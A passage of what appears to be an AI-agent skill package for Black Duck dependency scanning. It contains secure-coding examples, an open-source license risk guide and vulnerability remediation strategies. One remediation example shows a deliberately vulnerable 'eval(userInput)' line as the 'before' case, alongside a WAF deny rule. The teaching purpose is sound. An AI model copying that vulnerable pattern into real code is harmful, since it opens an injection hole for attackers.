Software Composition Analysis with Black Duck Overview Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify security vulnerabilities, license compliance risks, and supply chain threats in open source dependencies. This skill provides automated dependency scanning, vulnerability detection with CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards. Quick Start Scan a project for dependency vulnerabilities: Scan with policy violation enforcement: Core Workflows Workflow 1: Initial Dependency Security Assessme…

, user_id):\n raise ValueError(\"Invalid user ID format\")\n\n# Use ORM query builders\nuser = User.query.filter_by(id=user_id).first()\n```\n\n**Step 4: Implement least privilege**\n- Database user should have minimum required permissions\n- Use read-only accounts for SELECT operations\n- Never use admin/root accounts for application queries\n\n### XSS Remediation\n\n**Step 1: Enable auto-escaping**\n- Most modern frameworks escape by default\n- Ensure auto-escaping is not disabled\n\n**Step 2: Use framework-specific safe methods**\n\n```javascript\n// React: Use JSX (auto-escapes)\n\u003cdiv>{userInput}\u003c/div>\n\n// Vue: Use template syntax (auto-escapes)\n\u003cdiv>{{ userInput }}\u003c/div>\n\n// Angular: Use property binding (auto-escapes)\n\u003cdiv [textContent]=\"userInput\">\u003c/div>\n```\n\n**Step 3: Sanitize when HTML is required**\n\n```javascript\nimport DOMPurify from 'dompurify';\n\n// Sanitize HTML content\nconst clean = DOMPurify.sanitize(userHTML, {\n ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],\n ALLOWED_ATTR: []\n});\n```\n\n**Step 4: Content Security Policy (CSP)**\n\n```html\n\u003c!-- Add CSP header -->\nContent-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'\n```\n\n---\n\n## Advanced Configuration\n\nThis section contains detailed configuration options and tuning parameters.\n\n### Example: SAST Tool Configuration\n\n```yaml\n# Advanced security scanner configuration\nscanner:\n # Severity threshold\n severity_threshold: MEDIUM\n\n # Rule configuration\n rules:\n enabled:\n - sql-injection\n - xss\n - hardcoded-secrets\n disabled:\n - informational-only\n\n # False positive reduction\n confidence_threshold: HIGH\n exclude_patterns:\n - \"*/test/*\"\n - \"*/tests/*\"\n - \"*/node_modules/*\"\n - \"*.test.js\"\n - \"*.spec.ts\"\n\n # Performance tuning\n max_file_size_kb: 2048\n timeout_seconds: 300\n parallel_jobs: 4\n\n # Output configuration\n output_format: json\n include_code_snippets: true\n max_snippet_lines: 10\n```\n\n---\n\n## Examples and Code Samples\n\nThis section provides comprehensive code examples for various scenarios.\n\n### Example 1: Secure API Authentication\n\n```python\n# Secure API key handling\nimport os\nfrom functools import wraps\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n# Load API key from environment (never hardcode)\nVALID_API_KEY = os.environ.get('API_KEY')\nif not VALID_API_KEY:\n raise ValueError(\"API_KEY environment variable not set\")\n\ndef require_api_key(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n api_key = request.headers.get('X-API-Key')\n\n if not api_key:\n return jsonify({'error': 'API key required'}), 401\n\n # Constant-time comparison to prevent timing attacks\n import hmac\n if not hmac.compare_digest(api_key, VALID_API_KEY):\n return jsonify({'error': 'Invalid API key'}), 403\n\n return f(*args, **kwargs)\n return decorated_function\n\[email protected]('/api/secure-endpoint')\n@require_api_key\ndef secure_endpoint():\n return jsonify({'message': 'Access granted'})\n```\n\n### Example 2: Secure Password Hashing\n\n```python\n# Secure password storage with bcrypt\nimport bcrypt\n\ndef hash_password(password: str) -> str:\n \"\"\"Hash a password using bcrypt.\"\"\"\n # Generate salt and hash password\n salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)\n hashed = bcrypt.hashpw(password.encode('utf-8'), salt)\n return hashed.decode('utf-8')\n\ndef verify_password(password: str, hashed: str) -> bool:\n \"\"\"Verify a password against a hash.\"\"\"\n return bcrypt.checkpw(\n password.encode('utf-8'),\n hashed.encode('utf-8')\n )\n\n# Usage\nstored_hash = hash_password(\"user_password\")\nis_valid = verify_password(\"user_password\", stored_hash) # True\n```\n\n### Example 3: Secure File Upload\n\n```python\n# Secure file upload with validation\nimport os\nimport magic\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}\nALLOWED_MIME_TYPES = {\n 'application/pdf',\n 'image/png',\n 'image/jpeg'\n}\nMAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB\n\ndef is_allowed_file(filename: str, file_content: bytes) -> bool:\n \"\"\"Validate file extension and MIME type.\"\"\"\n # Check extension\n if '.' not in filename:\n return False\n\n ext = filename.rsplit('.', 1)[1].lower()\n if ext not in ALLOWED_EXTENSIONS:\n return False\n\n # Check MIME type (prevent extension spoofing)\n mime = magic.from_buffer(file_content, mime=True)\n if mime not in ALLOWED_MIME_TYPES:\n return False\n\n return True\n\ndef handle_upload(file):\n \"\"\"Securely handle file upload.\"\"\"\n # Check file size\n file.seek(0, os.SEEK_END)\n size = file.tell()\n file.seek(0)\n\n if size > MAX_FILE_SIZE:\n raise ValueError(\"File too large\")\n\n # Read content for validation\n content = file.read()\n file.seek(0)\n\n # Validate file type\n if not is_allowed_file(file.filename, content):\n raise ValueError(\"Invalid file type\")\n\n # Sanitize filename\n filename = secure_filename(file.filename)\n\n # Generate unique filename to prevent overwrite attacks\n import uuid\n unique_filename = f\"{uuid.uuid4()}_{filename}\"\n\n # Save to secure location (outside web root)\n upload_path = os.path.join('/secure/uploads', unique_filename)\n file.save(upload_path)\n\n return unique_filename\n```\n\n---\n\n## Best Practices for Reference Documents\n\n1. **Start with \"When to use\"** - Help Claude know when to load this reference\n2. **Include table of contents** - For documents >100 lines\n3. **Use concrete examples** - Code samples with vulnerable and fixed versions\n4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context\n5. **Provide remediation** - Don't just identify issues, show how to fix them\n6. **Organize logically** - Group related content, use clear headings\n7. **Keep examples current** - Use modern patterns and current framework versions\n8. **Be concise** - Even in references, challenge every sentence\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":15672,"content_sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f"},{"filename":"references/license_risk_guide.md","content":"# License Compliance Risk Assessment Guide\n\n## Table of Contents\n- [License Risk Categories](#license-risk-categories)\n- [Common Open Source Licenses](#common-open-source-licenses)\n- [License Compatibility](#license-compatibility)\n- [Compliance Workflows](#compliance-workflows)\n- [Legal Considerations](#legal-considerations)\n\n## License Risk Categories\n\n### High Risk - Copyleft (Strong)\n\n**Licenses**: GPL-2.0, GPL-3.0, AGPL-3.0\n\n**Characteristics**:\n- Requires derivative works to be open-sourced under same license\n- Source code distribution mandatory\n- AGPL extends to network use (SaaS applications)\n\n**Business Impact**: HIGH\n- May require releasing proprietary code as open source\n- Incompatible with most commercial software\n- Legal review required for any usage\n\n**Use Cases Where Allowed**:\n- Internal tools (not distributed)\n- Separate services with network boundaries\n- Dual-licensed components (use commercial license)\n\n**Example Compliance Violation**:\n```\nProduct: Commercial SaaS Application\nDependency: GPL-licensed library linked into application\nIssue: AGPL requires source code release for network-accessible software\nRisk: Legal liability, forced open-sourcing\n```\n\n### Medium Risk - Weak Copyleft\n\n**Licenses**: LGPL-2.1, LGPL-3.0, MPL-2.0, EPL-2.0\n\n**Characteristics**:\n- Copyleft applies only to modified library files\n- Allows proprietary applications if library used as separate component\n- Source modifications must be released\n\n**Business Impact**: MEDIUM\n- Safe if used as unmodified library (dynamic linking)\n- Modifications require open-sourcing\n- License compatibility considerations\n\n**Compliance Requirements**:\n- Keep library as separate, unmodified component\n- If modified, release modifications under same license\n- Attribute properly in documentation\n\n**Example Safe Usage**:\n```\nProduct: Commercial Application\nDependency: LGPL library via dynamic linking\nStatus: COMPLIANT\nReason: No modifications, used as separate component\n```\n\n### Low Risk - Permissive\n\n**Licenses**: MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause\n\n**Characteristics**:\n- Minimal restrictions on use and distribution\n- No copyleft requirements\n- Attribution required\n- Apache-2.0 includes patent grant\n\n**Business Impact**: LOW\n- Generally safe for commercial use\n- Simple compliance requirements\n- Industry standard for most projects\n\n**Compliance Requirements**:\n- Include license text in distribution\n- Preserve copyright notices\n- Apache-2.0: Include NOTICE file if present\n\n### Minimal Risk - Public Domain / Unlicense\n\n**Licenses**: CC0-1.0, Unlicense, Public Domain\n\n**Characteristics**:\n- No restrictions\n- No attribution required (though recommended)\n\n**Business Impact**: MINIMAL\n- Safest for commercial use\n- No compliance obligations\n\n## Common Open Source Licenses\n\n### Permissive Licenses\n\n#### MIT License\n\n**SPDX**: MIT\n**OSI Approved**: Yes\n**Risk Level**: LOW\n\n**Permissions**: Commercial use, modification, distribution, private use\n**Conditions**: Include license and copyright notice\n**Limitations**: No liability, no warranty\n\n**Common in**: JavaScript (React, Angular), Ruby (Rails)\n\n**Compliance Checklist**:\n- [ ] Include LICENSE file in distribution\n- [ ] Preserve copyright notices in source files\n- [ ] Credit in ABOUT/CREDITS file\n\n#### Apache License 2.0\n\n**SPDX**: Apache-2.0\n**OSI Approved**: Yes\n**Risk Level**: LOW\n\n**Permissions**: Same as MIT, plus explicit patent grant\n**Conditions**: Include license, preserve NOTICE file, state changes\n**Limitations**: No trademark use, no liability\n\n**Common in**: Java (Spring), Big Data (Hadoop, Kafka)\n\n**Key Difference from MIT**: Patent protection clause\n\n**Compliance Checklist**:\n- [ ] Include LICENSE file\n- [ ] Include NOTICE file if present\n- [ ] Document modifications\n- [ ] Don't use project trademarks\n\n#### BSD Licenses (2-Clause and 3-Clause)\n\n**SPDX**: BSD-2-Clause, BSD-3-Clause\n**OSI Approved**: Yes\n**Risk Level**: LOW\n\n**3-Clause Addition**: No endorsement using project name\n\n**Common in**: Unix utilities, networking libraries\n\n**Compliance Checklist**:\n- [ ] Include license text\n- [ ] Preserve copyright notices\n- [ ] BSD-3: No unauthorized endorsements\n\n### Weak Copyleft Licenses\n\n#### GNU LGPL 2.1 / 3.0\n\n**SPDX**: LGPL-2.1, LGPL-3.0\n**OSI Approved**: Yes\n**Risk Level**: MEDIUM\n\n**Safe Usage Patterns**:\n1. **Dynamic Linking**: Link as shared library without modification\n2. **Unmodified Use**: Use library as-is without code changes\n3. **Separate Component**: Keep as distinct, replaceable module\n\n**Unsafe Usage Patterns**:\n1. **Static Linking**: Compiling LGPL code into proprietary binary\n2. **Modifications**: Changing LGPL library code\n3. **Intimate Integration**: Tightly coupling with proprietary code\n\n**Common in**: GTK, glibc, Qt (dual-licensed)\n\n**Compliance for Unmodified Use**:\n- [ ] Provide library source code or offer to provide\n- [ ] Allow users to replace library\n- [ ] Include license text\n\n**Compliance for Modifications**:\n- [ ] Release modifications under LGPL\n- [ ] Provide modified source code\n- [ ] Document changes\n\n#### Mozilla Public License 2.0\n\n**SPDX**: MPL-2.0\n**OSI Approved**: Yes\n**Risk Level**: MEDIUM\n\n**File-Level Copyleft**: Only modified files must remain MPL\n\n**Common in**: Firefox, Rust standard library\n\n**Compliance**:\n- [ ] Keep MPL files in separate files\n- [ ] Release modifications to MPL files\n- [ ] May combine with proprietary code at module level\n\n### Strong Copyleft Licenses\n\n#### GNU GPL 2.0 / 3.0\n\n**SPDX**: GPL-2.0, GPL-3.0\n**OSI Approved**: Yes\n**Risk Level**: HIGH\n\n**Copyleft Scope**: Entire program must be GPL\n\n**Key Differences**:\n- **GPL-3.0**: Added anti-tivoization, patent provisions\n- **GPL-2.0**: More permissive for hardware restrictions\n\n**Common in**: Linux kernel (GPL-2.0), many GNU tools\n\n**When GPL is Acceptable**:\n1. **Internal Use**: Not distributed outside organization\n2. **Network Boundary**: Separate GPL service (API-based)\n3. **Dual-Licensed**: Use commercial license option\n\n**Compliance if Using**:\n- [ ] Entire program must be GPL-compatible\n- [ ] Provide source code to recipients\n- [ ] Include license and build instructions\n\n#### GNU AGPL 3.0\n\n**SPDX**: AGPL-3.0\n**OSI Approved**: Yes\n**Risk Level**: CRITICAL for SaaS\n\n**Network Copyleft**: Source code required even for network use\n\n**Common in**: Some database tools, server software\n\n**Critical for**: SaaS, web applications, APIs\n\n**Avoid Unless**: Prepared to open-source entire application\n\n### Proprietary / Commercial Licenses\n\n**Risk Level**: VARIES (requires legal review)\n\n**Common Scenarios**:\n- Evaluation/trial licenses (non-production)\n- Dual-licensed (commercial option available)\n- Runtime licenses (e.g., database drivers)\n\n**Compliance**: Follow vendor-specific terms\n\n## License Compatibility\n\n### Compatibility Matrix\n\n| Your Project | MIT | Apache-2.0 | LGPL | GPL | AGPL |\n|--------------|-----|-----------|------|-----|------|\n| Proprietary | ✅ | ✅ | ⚠️ | ❌ | ❌ |\n| MIT | ✅ | ✅ | ⚠️ | ❌ | ❌ |\n| Apache-2.0 | ✅ | ✅ | ⚠️ | ⚠️ | ❌ |\n| LGPL | ✅ | ✅ | ✅ | ⚠️ | ❌ |\n| GPL | ✅ | ⚠️ | ✅ | ✅ | ⚠️ |\n| AGPL | ✅ | ⚠️ | ✅ | ✅ | ✅ |\n\n**Legend**:\n- ✅ Compatible\n- ⚠️ Compatible with conditions\n- ❌ Incompatible\n\n### Common Incompatibilities\n\n**Apache-2.0 with GPL-2.0**:\n- Issue: GPL-2.0 doesn't have explicit patent grant\n- Solution: Use GPL-3.0 instead (compatible with Apache-2.0)\n\n**GPL with Proprietary**:\n- Issue: GPL requires derivative works be GPL\n- Solution: Keep as separate program, use network boundary\n\n**AGPL with SaaS**:\n- Issue: AGPL triggers on network use\n- Solution: Avoid AGPL or use commercial license\n\n## Compliance Workflows\n\n### Initial License Assessment\n\n1. **Scan Dependencies**\n ```bash\n scripts/blackduck_scan.py --project MyApp --version 1.0.0 --report-type license\n ```\n\n2. **Categorize Licenses by Risk**\n - Review all HIGH risk licenses immediately\n - Assess MEDIUM risk licenses for compliance requirements\n - Document LOW risk licenses for attribution\n\n3. **Legal Review**\n - Escalate HIGH risk licenses to legal team\n - Get approval for MEDIUM risk usage patterns\n - Document decisions\n\n### Continuous License Monitoring\n\n**In CI/CD Pipeline**:\n```yaml\n# GitHub Actions example\n- name: License Compliance Check\n run: |\n scripts/blackduck_scan.py \\\n --project ${{ github.repository }} \\\n --version ${{ github.sha }} \\\n --report-type license \\\n --fail-on-blocklisted-licenses\n```\n\n**Policy Enforcement**:\n- Block builds with GPL/AGPL dependencies\n- Require approval for new LGPL dependencies\n- Auto-approve MIT/Apache-2.0\n\n### License Remediation\n\n**For High-Risk Licenses**:\n\n1. **Replace Component**\n - Find MIT/Apache alternative\n - Example: MySQL (GPL) → PostgreSQL (PostgreSQL License - permissive)\n\n2. **Commercial License**\n - Purchase commercial license if available\n - Example: Qt (LGPL or Commercial)\n\n3. **Separate Service**\n - Run GPL component as separate service\n - Communicate via API/network\n\n4. **Remove Dependency**\n - Implement functionality directly\n - Use different approach\n\n### Attribution and Notices\n\n**Required Artifacts**:\n\n**LICENSES.txt** - All license texts:\n```\nThis software includes the following third-party components:\n\n1. Component Name v1.0.0\n License: MIT\n Copyright (c) 2024 Author\n [Full license text]\n\n2. Another Component v2.0.0\n License: Apache-2.0\n [Full license text]\n```\n\n**NOTICE.txt** - Attribution notices (if Apache-2.0 dependencies):\n```\nThis product includes software developed by\nThe Apache Software Foundation (http://www.apache.org/).\n\n[Additional NOTICE content from Apache-licensed dependencies]\n```\n\n**UI/About Screen**:\n- List major third-party components\n- Link to full license information\n- Provide \"Open Source Licenses\" section\n\n## Legal Considerations\n\n### When to Consult Legal Counsel\n\n**Always Consult for**:\n- GPL/AGPL in commercial products\n- Dual-licensing decisions\n- Patent-related concerns\n- Proprietary license negotiations\n- M&A due diligence\n- License violations/disputes\n\n### Common Legal Questions\n\n**Q: Can I use GPL code in a SaaS application?**\nA: GPL-2.0/3.0 yes (no distribution), AGPL-3.0 no (network use triggers copyleft)\n\n**Q: What if I modify an MIT-licensed library?**\nA: You can keep modifications proprietary, just preserve MIT license\n\n**Q: Can I remove license headers from code?**\nA: No, preserve all copyright and license notices\n\n**Q: What's the difference between \"linking\" and \"use\"?**\nA: Legal concept varies by jurisdiction; consult attorney for specific cases\n\n### Audit and Compliance Documentation\n\n**Maintain Records**:\n- Complete SBOM with license information\n- License review approvals\n- Component selection rationale\n- Exception approvals with expiration dates\n\n**Quarterly Review**:\n- Update license inventory\n- Review new dependencies\n- Renew/revoke exceptions\n- Update attribution files\n\n## Tools and Resources\n\n**Black Duck Features**:\n- Automated license detection\n- License risk categorization\n- Policy enforcement\n- Bill of Materials with licenses\n\n**Additional Tools**:\n- FOSSA - License compliance automation\n- WhiteSource - License management\n- Snyk - License scanning\n\n**Resources**:\n- [SPDX License List](https://spdx.org/licenses/)\n- [Choose A License](https://choosealicense.com/)\n- [TL;DR Legal](https://tldrlegal.com/)\n- [OSI Approved Licenses](https://opensource.org/licenses)\n\n## License Risk Scorecard Template\n\n```markdown\n# License Risk Assessment: [Component Name]\n\n**Component**: component-name@version\n**License**: [SPDX ID]\n**Risk Level**: [HIGH/MEDIUM/LOW]\n\n## Usage Context\n- [ ] Used in distributed product\n- [ ] Used in SaaS/cloud service\n- [ ] Internal tool only\n- [ ] Modifications made: [Yes/No]\n\n## Risk Assessment\n- **Copyleft Trigger**: [Yes/No/Conditional]\n- **Patent Concerns**: [Yes/No]\n- **Commercial Use Allowed**: [Yes/No]\n\n## Compliance Requirements\n- [ ] Include license text\n- [ ] Provide source code\n- [ ] Include NOTICE file\n- [ ] Preserve copyright notices\n- [ ] Other: _______\n\n## Decision\n- [X] Approved for use\n- [ ] Requires commercial license\n- [ ] Find alternative\n- [ ] Legal review pending\n\n**Approved By**: [Name, Date]\n**Review Date**: [Date]\n```\n\n## References\n\n- [Open Source Initiative](https://opensource.org/)\n- [Free Software Foundation](https://www.fsf.org/licensing/)\n- [Linux Foundation - Open Compliance Program](https://www.linuxfoundation.org/projects/open-compliance)\n- [Google Open Source License Guide](https://opensource.google/documentation/reference/thirdparty/licenses)\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":12725,"content_sha256":"d6cc3eb15ff779116aa093f5e05c1ff10c7747a467b3baf596f217b424568016"},{"filename":"references/remediation_strategies.md","content":"# Vulnerability Remediation Strategies\n\n## Table of Contents\n- [Remediation Decision Framework](#remediation-decision-framework)\n- [Strategy 1: Upgrade to Fixed Version](#strategy-1-upgrade-to-fixed-version)\n- [Strategy 2: Apply Security Patch](#strategy-2-apply-security-patch)\n- [Strategy 3: Replace Component](#strategy-3-replace-component)\n- [Strategy 4: Implement Mitigations](#strategy-4-implement-mitigations)\n- [Strategy 5: Risk Acceptance](#strategy-5-risk-acceptance)\n- [Language-Specific Guidance](#language-specific-guidance)\n\n## Remediation Decision Framework\n\n```\nIs patch/upgrade available?\n├─ Yes → Can we upgrade without breaking changes?\n│ ├─ Yes → UPGRADE (Strategy 1)\n│ └─ No → Are breaking changes acceptable?\n│ ├─ Yes → UPGRADE with refactoring (Strategy 1)\n│ └─ No → Can we apply patch? (Strategy 2)\n│ ├─ Yes → PATCH\n│ └─ No → REPLACE or MITIGATE (Strategy 3/4)\n│\n└─ No → Is vulnerability exploitable in our context?\n ├─ Yes → Can we replace component?\n │ ├─ Yes → REPLACE (Strategy 3)\n │ └─ No → MITIGATE (Strategy 4)\n │\n └─ No → ACCEPT with justification (Strategy 5)\n```\n\n## Strategy 1: Upgrade to Fixed Version\n\n**When to use**: Patch available in newer version, upgrade path is clear\n\n**Priority**: HIGHEST - This is the preferred remediation method\n\n### Upgrade Process\n\n1. **Identify Fixed Version**\n ```bash\n # Check Black Duck scan results for fixed version\n # Verify in CVE database or component changelog\n ```\n\n2. **Review Breaking Changes**\n - Read release notes and changelog\n - Check migration guides\n - Review API changes and deprecations\n\n3. **Update Dependency**\n\n **Node.js/npm**:\n ```bash\n npm install package-name@fixed-version\n npm audit fix # Auto-fix where possible\n ```\n\n **Python/pip**:\n ```bash\n pip install package-name==fixed-version\n pip-audit --fix # Auto-fix vulnerabilities\n ```\n\n **Java/Maven**:\n ```xml\n \u003cdependency>\n \u003cgroupId>org.example\u003c/groupId>\n \u003cartifactId>vulnerable-lib\u003c/artifactId>\n \u003cversion>fixed-version\u003c/version>\n \u003c/dependency>\n ```\n\n **Ruby/Bundler**:\n ```bash\n bundle update package-name\n ```\n\n **.NET/NuGet**:\n ```bash\n dotnet add package PackageName --version fixed-version\n ```\n\n4. **Test Thoroughly**\n - Run existing test suite\n - Test affected functionality\n - Perform integration testing\n - Consider security-specific test cases\n\n5. **Re-scan**\n ```bash\n scripts/blackduck_scan.py --project MyApp --version 1.0.1\n ```\n\n### Handling Breaking Changes\n\n**Minor Breaking Changes**: Acceptable for security fixes\n- Update function calls to new API\n- Adjust configuration for new defaults\n- Update type definitions\n\n**Major Breaking Changes**: Requires planning\n- Create feature branch for upgrade\n- Refactor code incrementally\n- Use adapter pattern for compatibility\n- Consider gradual rollout\n\n**Incompatible Changes**: May require alternative strategy\n- Evaluate business impact\n- Consider Strategy 3 (Replace)\n- If critical, implement Strategy 4 (Mitigate) temporarily\n\n## Strategy 2: Apply Security Patch\n\n**When to use**: Vendor provides patch without full version upgrade\n\n**Priority**: HIGH - Use when full upgrade is not feasible\n\n### Patch Types\n\n**Backported Patches**:\n- Vendor provides patch for older version\n- Common in LTS/enterprise distributions\n- Apply using vendor's instructions\n\n**Custom Patches**:\n- Create patch from upstream fix\n- Test extensively before deployment\n- Document patch application process\n\n### Patch Application Process\n\n1. **Obtain Patch**\n - Vendor security advisory\n - GitHub commit/pull request\n - Security mailing list\n\n2. **Validate Patch**\n ```bash\n # Review patch contents\n git diff vulnerable-version..patched-version -- affected-file.js\n\n # Verify patch signature if available\n gpg --verify patch.sig patch.diff\n ```\n\n3. **Apply Patch**\n\n **Git-based**:\n ```bash\n # Apply patch from file\n git apply security-patch.diff\n\n # Or cherry-pick specific commit\n git cherry-pick security-fix-commit-sha\n ```\n\n **Package manager overlay**:\n ```bash\n # npm patch-package\n npx patch-package package-name\n\n # pip with local modifications\n pip install -e ./patched-package\n ```\n\n4. **Test and Verify**\n - Verify vulnerability is fixed\n - Run security scan\n - Test functionality\n\n5. **Document Patch**\n - Create internal documentation\n - Add to dependency management notes\n - Set reminder for proper upgrade\n\n## Strategy 3: Replace Component\n\n**When to use**: No fix available, or component is unmaintained\n\n**Priority**: MEDIUM-HIGH - Architectural change required\n\n### Replacement Process\n\n1. **Identify Alternatives**\n\n **Evaluation Criteria**:\n - Active maintenance (recent commits, releases)\n - Security track record\n - Community size and support\n - Feature parity\n - License compatibility\n - Performance characteristics\n\n **Research Sources**:\n - Black Duck component quality metrics\n - GitHub stars/forks/issues\n - Security advisories history\n - StackOverflow activity\n - Production usage at scale\n\n2. **Select Replacement**\n\n **Example Replacements**:\n\n | Vulnerable Component | Alternative | Reason |\n |---------------------|-------------|--------|\n | moment.js | date-fns, dayjs | No longer maintained |\n | request (npm) | axios, node-fetch | Deprecated |\n | xml2js | fast-xml-parser | XXE vulnerabilities |\n | lodash (full) | lodash-es (specific functions) | Reduce attack surface |\n\n3. **Plan Migration**\n - Map API differences\n - Identify all usage locations\n - Create compatibility layer if needed\n - Plan gradual migration if large codebase\n\n4. **Execute Replacement**\n ```bash\n # Remove vulnerable component\n npm uninstall vulnerable-package\n\n # Install replacement\n npm install secure-alternative\n\n # Update imports/requires across codebase\n # Use tools like jscodeshift for automated refactoring\n ```\n\n5. **Verify**\n - Scan for residual references\n - Test all affected code paths\n - Re-scan with Black Duck\n\n## Strategy 4: Implement Mitigations\n\n**When to use**: No fix/replacement available, vulnerability cannot be eliminated\n\n**Priority**: MEDIUM - Compensating controls required\n\n### Mitigation Techniques\n\n#### Input Validation and Sanitization\n\nFor injection vulnerabilities:\n```javascript\n// Before: Vulnerable to injection\nconst result = eval(userInput);\n\n// Mitigation: Strict validation and safe alternatives\nconst allowlist = ['option1', 'option2'];\nif (!allowlist.includes(userInput)) {\n throw new Error('Invalid input');\n}\nconst result = safeEvaluate(userInput);\n```\n\n#### Network Segmentation\n\nFor RCE/SSRF vulnerabilities:\n- Deploy vulnerable component in isolated network segment\n- Restrict outbound network access\n- Use Web Application Firewall (WAF) rules\n- Implement egress filtering\n\n#### Access Controls\n\nFor authentication/authorization bypasses:\n```python\n# Additional validation layer\n@require_additional_auth\ndef sensitive_operation():\n # Vulnerable library call\n vulnerable_lib.do_operation()\n```\n\n#### Runtime Protection\n\n**Application Security Tools**:\n- RASP (Runtime Application Self-Protection)\n- Virtual patching via WAF\n- Container security policies\n\n**Example - WAF Rule**:\n```nginx\n# ModSecurity rule to block exploitation attempt\nSecRule REQUEST_URI \"@rx /vulnerable-endpoint\" \\\n \"id:1001,phase:1,deny,status:403,\\\n msg:'Blocked access to vulnerable component'\"\n```\n\n#### Minimize Attack Surface\n\n**Disable Vulnerable Features**:\n```xml\n\u003c!-- Disable XXE in XML parser -->\n\u003cbean class=\"javax.xml.parsers.DocumentBuilderFactory\">\n \u003cproperty name=\"features\">\n \u003cmap>\n \u003centry key=\"http://apache.org/xml/features/disallow-doctype-decl\" value=\"true\"/>\n \u003centry key=\"http://xml.org/sax/features/external-general-entities\" value=\"false\"/>\n \u003c/map>\n \u003c/property>\n\u003c/bean>\n```\n\n**Remove Unused Code**:\n```bash\n# Remove unused dependencies\nnpm prune\npip-autoremove\n\n# Tree-shake unused code\nwebpack --mode production # Removes unused exports\n```\n\n### Monitoring and Detection\n\nImplement enhanced monitoring for vulnerable components:\n\n```python\n# Example: Log and alert on vulnerable code path usage\nimport logging\n\ndef wrap_vulnerable_function(original_func):\n def wrapper(*args, **kwargs):\n logging.warning(\n \"SECURITY: Vulnerable function called\",\n extra={\n \"function\": original_func.__name__,\n \"args\": args,\n \"caller\": inspect.stack()[1]\n }\n )\n # Alert security team\n send_security_alert(\"Vulnerable code path executed\")\n return original_func(*args, **kwargs)\n return wrapper\n\n# Apply wrapper\nvulnerable_lib.dangerous_function = wrap_vulnerable_function(\n vulnerable_lib.dangerous_function\n)\n```\n\n## Strategy 5: Risk Acceptance\n\n**When to use**: Vulnerability is not exploitable in your context, or risk is acceptable\n\n**Priority**: LOWEST - Only after thorough risk analysis\n\n### Risk Acceptance Criteria\n\n**Acceptable when ALL of these are true**:\n1. Vulnerability is not exploitable in deployment context\n2. Attack requires significant preconditions (e.g., admin access)\n3. Vulnerable code path is never executed\n4. Impact is negligible even if exploited\n5. Mitigation cost exceeds risk\n\n### Risk Acceptance Process\n\n1. **Document Justification**\n ```markdown\n # Risk Acceptance: CVE-2023-XXXXX in component-name\n\n **Vulnerability**: SQL Injection in admin panel\n **CVSS Score**: 8.5 (HIGH)\n **Component**: [email protected]\n\n **Justification for Acceptance**:\n - Admin panel is only accessible to authenticated administrators\n - Additional authentication layer required (2FA)\n - Network access restricted to internal network only\n - No sensitive data accessible via this component\n - Monitoring in place for suspicious activity\n\n **Mitigation Controls**:\n - WAF rules blocking SQL injection patterns\n - Enhanced logging on admin endpoints\n - Network segmentation\n - Regular security audits\n\n **Review Date**: 2024-06-01\n **Approved By**: CISO, Security Team Lead\n **Next Review**: 2024-09-01\n ```\n\n2. **Implement Compensating Controls**\n - Enhanced monitoring\n - Additional authentication layers\n - Network restrictions\n - Regular security reviews\n\n3. **Set Review Schedule**\n - Quarterly reviews for HIGH/CRITICAL\n - Semi-annual for MEDIUM\n - Annual for LOW\n\n4. **Track in Black Duck**\n ```bash\n # Mark as accepted risk in Black Duck with expiration\n # Use Black Duck UI or API to create policy exception\n ```\n\n## Language-Specific Guidance\n\n### JavaScript/Node.js\n\n**Tools**:\n- `npm audit` - Built-in vulnerability scanner\n- `npm audit fix` - Automatic remediation\n- `yarn audit` - Yarn's vulnerability scanner\n- `snyk` - Commercial SCA tool\n\n**Best Practices**:\n- Lock dependencies with `package-lock.json`\n- Use `npm ci` in CI/CD for reproducible builds\n- Audit transitive dependencies\n- Consider `npm-force-resolutions` for forcing versions\n\n### Python\n\n**Tools**:\n- `pip-audit` - Scan for vulnerabilities\n- `safety` - Check against vulnerability database\n- `pip-check` - Verify package compatibility\n\n**Best Practices**:\n- Use `requirements.txt` and `pip freeze`\n- Pin exact versions for security-critical deps\n- Use virtual environments\n- Consider `pip-tools` for dependency management\n\n### Java\n\n**Tools**:\n- OWASP Dependency-Check\n- Snyk for Java\n- Black Duck (commercial)\n\n**Best Practices**:\n- Use dependency management (Maven, Gradle)\n- Lock versions in `pom.xml` or `build.gradle`\n- Scan with `mvn dependency:tree` for transitive deps\n- Use Maven Enforcer Plugin for version policies\n\n### .NET\n\n**Tools**:\n- `dotnet list package --vulnerable`\n- OWASP Dependency-Check\n- WhiteSource Bolt\n\n**Best Practices**:\n- Use `PackageReference` in project files\n- Lock versions with `packages.lock.json`\n- Enable NuGet package validation\n- Use `dotnet outdated` to track updates\n\n### Ruby\n\n**Tools**:\n- `bundle audit` - Check for vulnerabilities\n- `bundler-audit` - Automated checking\n\n**Best Practices**:\n- Use `Gemfile.lock` for reproducible deps\n- Run `bundle audit` in CI/CD\n- Update regularly with `bundle update`\n- Use pessimistic version constraints\n\n## Remediation Workflow Checklist\n\nFor each vulnerability:\n\n- [ ] Identify vulnerability details (CVE, CVSS, affected versions)\n- [ ] Determine if vulnerability is exploitable in your context\n- [ ] Check for fixed version or patch availability\n- [ ] Assess upgrade/patch complexity and breaking changes\n- [ ] Select remediation strategy (Upgrade/Patch/Replace/Mitigate/Accept)\n- [ ] Create remediation plan with timeline\n- [ ] Execute remediation\n- [ ] Test thoroughly (functionality + security)\n- [ ] Re-scan with Black Duck to confirm fix\n- [ ] Document changes and lessons learned\n- [ ] Deploy to production with rollback plan\n- [ ] Monitor for issues post-deployment\n\n## References\n\n- [NIST Vulnerability Management Guide](https://nvd.nist.gov/)\n- [OWASP Dependency Management Cheat 